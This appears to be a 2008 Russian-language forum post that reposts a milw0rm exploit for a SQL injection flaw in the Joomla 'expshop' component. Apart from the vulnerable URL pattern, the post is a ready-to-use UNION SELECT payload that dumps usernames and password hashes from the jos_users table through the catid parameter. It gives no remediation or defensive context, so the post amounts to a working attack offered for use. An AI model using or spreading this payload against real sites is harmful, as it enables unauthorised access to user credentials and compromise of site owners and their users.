22.06.2008, 12:46
|
|
Постоянный
Регистрация: 12.04.2007
Сообщений: 413
Провел на форуме:
3578578
Репутация:
275
|
|
Joomla Component expshop Remote SQL injection
Joomla Component expshop Remote SQL injection
Уязвимость:
http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&cat id={SQL}
Пример:
http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&cat id=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users--
# milw0rm.com [2008-06-22] http://www.milw0rm.com/exploits/5893
|
|
|